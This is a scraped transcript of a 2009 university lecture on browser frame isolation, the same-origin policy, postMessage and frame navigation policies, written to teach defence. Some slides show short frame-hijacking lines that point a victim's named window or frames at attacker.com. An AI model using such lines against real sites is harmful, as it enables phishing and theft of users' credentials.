Presentation is loading. Please wait.

Presentation is loading. Please wait.

Frame isolation and the same origin policy Collin Jackson CS 142 Winter 2009.

Published byAdela Smith Modified over 9 years ago

Similar presentations

Presentation on theme: "Frame isolation and the same origin policy Collin Jackson CS 142 Winter 2009."— Presentation transcript:

1 Frame isolation and the same origin policy Collin Jackson CS 142 Winter 2009

2 Outline Security User Interface Goals of a browser When is it safe to type my password? Same-Origin Policy How sites are isolated Opting out of isolation Navigation Frame hijacking Navigation policy

3 3 Running Remote Code is Risky Integrity Compromise your machine Install malware rootkit Transact on your accounts Confidentiality Read your information Steal passwords Read your email

4 4 Browser Sandbox Goal Run remote web applications safely Limited access to OS, network, and browser data Approach Isolate sites in different security contexts Browser manages resources, like an OS

5 5 Security User Interface When is it safe to type my password?

6 Safe to type your password? 6

7 7

8 8

9 9 ???

10 Safe to type your password? 10

11 Frames Modularity Brings together content from multiple sources Client-side aggregation Delegation Frame can draw only on its own rectangle src = 7.gmodules.com/... name = remote_iframe_7 src = google.com/… name = awglogin

12 Popup windows With hyperlinks click here With JavaScript mywin = window.open(“http://www.b.com”, “foo”, “width=10,height=10”) Navigating named window re-uses existing one Can access properties of remote window: mywin.document.body mywin.location = “http://www.c.com”;

13 Windows Interact 13

14 Are all interactions good? 14

15 15 Same-Origin Policy How does the browser isolate different sites?

16 Policy Goals Safe to visit an evil web site Safe to visit two pages at the same time Address bar distinguishes them Allow safe delegation

17 Same Origin Policy Origin = protocol://host:port Full access to same origin Full network access Read/write DOM Storage (more on Weds.) Assumptions? Site A Site A context

18 Library import Script has privileges of imported page, NOT source server. Can script other pages in this origin, load more scripts Other forms of importing VeriSign

19 Data export Many ways to send information to other origins No user involvement required Cannot read back response

20 Domain Relaxation Origin: scheme, host, (port), hasSetDomain Try document.domain = document.domain www.facebook.com chat.facebook.com facebook.com

21 Recent Developments Cross-origin network requests Access-Control-Allow-Origin: Access-Control-Allow-Origin: * Cross-origin client side communication Client-side messaging via navigation (older browsers) postMessage (newer browsers) Site B Site A Site A contextSite B context

22 window.postMessage New API for inter-frame communication Supported in latest betas of many browsers A network-like channel between frames Add a contact Share contacts

23 postMessage syntax frames[0].postMessage("Attack at dawn!", "http://b.com/"); window.addEventListener("message", function (e) { if (e.origin == "http://a.com") {... e.data... } }, false); Facebook Anecdote Facebook Anecdote Attack at dawn!

24 24 Navigation Who decides what content goes in a frame?

25 25 A Guninski Attack awglogin window.open("https://attacker.com/", "awglogin");

26 What should the policy be? 26 Child Sibling Descendant Frame Bust

27 BrowserPolicy IE 6 (default)Permissive IE 6 (option)Child IE7 (no Flash)Descendant IE7 (with Flash)Permissive Firefox 2Window Safari 3Permissive Opera 9Window HTML 5Child Legacy Browser Behavior

28 Window Policy Anomaly top.frames[1].location = "http://www.attacker.com/..."; top.frames[2].location = "http://www.attacker.com/...";...

29 BrowserPolicy IE7 (no Flash)Descendant IE7 (with Flash)Descendant Firefox 3Descendant Safari 3Descendant Opera 9(many policies) HTML 5Descendant Adoption of Descendant Policy

30 Why include “targetOrigin”? What goes wrong? frames[0].postMessage("Attack at dawn!"); Messages sent to frames, not principals When would this happen? 30

31 Conclusion Same origin policy is flexible Address bar reflects the principal that's in control Content may be affected by other principals Delegation Library import Domain relaxation Pixel delegation via frames Communication Data export Opt-in messaging

32 Reading Securing Browser Frame Communication. Adam Barth, Collin Jackson, and John C. Mitchell http://code.google.com/p/browsersec/w iki/Part2#Same-origin_policy

Download ppt "Frame isolation and the same origin policy Collin Jackson CS 142 Winter 2009."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.

Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.
Presented by Vaibhav Rastogi. Current browsers try to separate host system from Web Websites evolved into web applications Lot of private data on the.

Presented by Vaibhav Rastogi. Current browsers try to separate host system from Web Websites evolved into web applications Lot of private data on the.
ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.

ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.
JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.
Building web applications on top of encrypted data using Mylar Presented by Tenglu Liang Tai Liu.

Building web applications on top of encrypted data using Mylar Presented by Tenglu Liang Tai Liu.
Copyright © 2012 Certification Partners, LLC -- All Rights Reserved Lesson 4: Web Browsing.

Copyright © 2012 Certification Partners, LLC -- All Rights Reserved Lesson 4: Web Browsing.
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Lesson 4: Web Browsing.

Lesson 4: Web Browsing.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
ACTIVE X By Ethan Huang. OUTLINE What is ActiveX? Component of ActiveX Why ActiveX? ActiveX and Java Security Issue.

ACTIVE X By Ethan Huang. OUTLINE What is ActiveX? Component of ActiveX Why ActiveX? ActiveX and Java Security Issue.
Beware of Finer-Grained Origins

Beware of Finer-Grained Origins
Happy Hacking HTML5! Group members: Dongyang Zhang Wei Liu Weizhou He Yutong Wei Yuxin Zhu.

Happy Hacking HTML5! Group members: Dongyang Zhang Wei Liu Weizhou He Yutong Wei Yuxin Zhu.
Phu H. Phung Chalmers University of Technology JSTools’ 12 June 13, 2012, Beijing, China Joint work with Lieven Desmet (KU Leuven)

Phu H. Phung Chalmers University of Technology JSTools’ 12 June 13, 2012, Beijing, China Joint work with Lieven Desmet (KU Leuven)
1 Subspace: Secure Cross Domain Communication for Web Mashups Collin Jackson and Helen J. Wang Mamadou H. Diallo.

1 Subspace: Secure Cross Domain Communication for Web Mashups Collin Jackson and Helen J. Wang Mamadou H. Diallo.
Subspace: Secure Cross-Domain Communication for Web Mashups Collin Jackson Stanford University Helen J. Wang Microsoft Research ACM WWW, May, 2007 Presenter:

Subspace: Secure Cross-Domain Communication for Web Mashups Collin Jackson Stanford University Helen J. Wang Microsoft Research ACM WWW, May, 2007 Presenter:
Subspace: Secure Cross-Domain Communication for Web Mashups In Proceedings of the 16th International World Wide Web Conference. (WWW), 2007 Collin Jackson,

Subspace: Secure Cross-Domain Communication for Web Mashups In Proceedings of the 16th International World Wide Web Conference. (WWW), 2007 Collin Jackson,
Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 10 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
DAT602 Database Application Development Lecture 15 Java Server Pages Part 1.

DAT602 Database Application Development Lecture 15 Java Server Pages Part 1.
Presented by…. Group 2 1. Programming language 2Introduction.

Presented by…. Group 2 1. Programming language 2Introduction.

Similar presentations

Ads by Google